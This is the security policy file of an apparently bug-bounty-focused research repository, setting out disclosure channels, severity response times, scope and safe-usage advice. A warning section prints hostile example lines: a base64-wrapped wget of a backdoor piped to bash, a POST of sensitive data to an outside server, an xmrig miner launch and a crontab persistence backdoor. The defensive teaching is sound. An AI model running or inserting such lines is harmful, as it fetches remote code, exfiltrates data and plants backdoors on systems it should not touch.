The security of this repository and its users is our highest priority. We are committed to maintaining a secure environment for sharing security research, tools, and methodologies while protecting against misuse.
| Version | Supported |
|---|---|
| Latest commit (main branch) | β Active support |
| Previous releases | |
| Archived versions | β Unsupported |
Note: Only the most recent version of tools and scripts receives security updates. Always pull the latest changes before use.
If you discover a security vulnerability within this repository (vulnerable code, exposed credentials, or other security issues):
DO NOT OPEN A PUBLIC ISSUE - This could expose the vulnerability to malicious actors.
Instead, follow our responsible disclosure process:
-
Email: awjunaid@proton.me
- Subject:
[SECURITY] Bug Bounty Repo - Brief Description - Include PGP key if you require encrypted communication
- Subject:
-
Signal/WhatsApp: Available upon request for sensitive disclosures
- Contact via email first to arrange secure channel
-
Discord: DM
@awjunaid(only for non-critical issues)
- Description of the vulnerability
- Steps to reproduce (proof of concept)
- Affected files/components
- Potential impact
- Suggested fix (if any)
- Your contact information for follow-up
| Stage | Expected Timeframe |
|---|---|
| Initial acknowledgment | Within 24-48 hours |
| Verification & assessment | Within 3-5 business days |
| Fix development | Based on severity |
| Public disclosure coordination | Coordinated with reporter |
- Acknowledgment: You'll receive confirmation within 48 hours
- Communication: Regular updates on progress
- Credit: Public acknowledgment (with your permission)
- Disclosure: Coordinated disclosure timeline
| Severity | Description | Response Time |
|---|---|---|
| Critical | Remote code execution, credential exposure, authentication bypass | < 24 hours |
| High | XSS, CSRF, SQLi in repository tools | < 48 hours |
| Medium | Information disclosure, misconfigurations | < 1 week |
| Low | Minor issues, typos in security docs | < 2 weeks |
# ALWAYS review code before execution
cat suspicious-script.sh # Review first
./suspicious-script.sh # Execute after review
# Use isolated environments
docker run -it --rm kali-linux /bin/bash
# OR
python3 -m venv isolated-env
source isolated-env/bin/activate
# Never run as root/sudo unless absolutely necessary
sudo python3 script.py # β οΈ AVOID THIS
python3 script.py # β
PREFER THIS-
Isolate Testing Environments
- Use VMs, containers, or dedicated testing machines
- Never test on production systems
- Maintain separate environments for different tools
-
Verify Tool Sources
- Check file hashes when provided
- Review code for suspicious patterns
- Be cautious with obfuscated code
-
Handle Payloads Carefully
- Treat all payloads as potentially dangerous
- Use proper output encoding
- Never use real credentials in examples
-
Network Safety
- Use VPN when testing
- Monitor outgoing connections
- Be aware of callbacks/reverse shells
β Never:
- Run tools without understanding what they do
- Commit real API keys, tokens, or credentials
- Share active 0-days without coordination
- Use these tools against unauthorized targets
- Execute scripts with
curl | bashpatterns - Store sensitive data in plaintext within the repo
Watch out for these suspicious patterns:
# π¨ SUSPICIOUS - Base64 encoded commands
os.system("echo d2dldCBodHRwOi8vbWFsaWNpb3VzLmNvbS9iYWNrZG9vci5zaCB8IGJhc2gK | base64 -d | bash")
# π¨ SUSPICIOUS - Hidden data exfiltration
requests.post("http://unknown-server.com/collect", data=sensitive_info)
# π¨ SUSPICIOUS - Cryptominers
subprocess.run(["./xmrig", "--url=pool.supportxmr.com"])
# π¨ SUSPICIOUS - Unusual persistence
os.system("crontab -l | { cat; echo '* * * * * /tmp/backdoor'; } | crontab -")IN SCOPE:
- Vulnerabilities in tools/scripts within this repo
- Exposed secrets/credentials in commits
- Security misconfigurations in repo settings
- Vulnerable dependencies in documented tools
OUT OF SCOPE:
- Vulnerabilities in third-party tools we reference
- Issues requiring unlikely user interaction
- Missing security headers on GitHub Pages (if any)
- Vulnerabilities in forked repositories
We follow coordinated disclosure:
- Report received via private channel
- Verification and impact assessment
- Fix developed and tested
- For critical issues: Private notification to active users
- Public disclosure with advisory
- CVE request if applicable
This repository does NOT offer monetary rewards. However, we provide:
- β Public acknowledgment in Hall of Fame
- β LinkedIn recommendation (upon request)
- β Reference letter for significant findings
- β Shoutout on social media channels
- β Contributor status in repository
- Branch Protection: Main branch requires reviews
- Secret Scanning: GitHub's secret scanning enabled
- Dependabot: Automated dependency updates
- CodeQL: Static analysis security testing
- 2FA Required: For all maintainers
If you discover someone using this repository's content for malicious purposes:
- Document the misuse with evidence
- Contact us at awjunaid@proton.me
- Subject:
[MISUSE] Brief description
We will:
- Investigate the report
- Take appropriate action (content removal, access revocation)
- Report to relevant platforms/programs if necessary
- Assist affected parties where possible
- OWASP Secure Coding Practices
- GitHub Security Best Practices
- Python Security Best Practices
- Bash Script Security
Security Team Contact:
- Lead: Abdul Wahab Junaid (@aw-junaid)
- Email: awjunaid@proton.me
- Response Time: < 24 hours for critical issues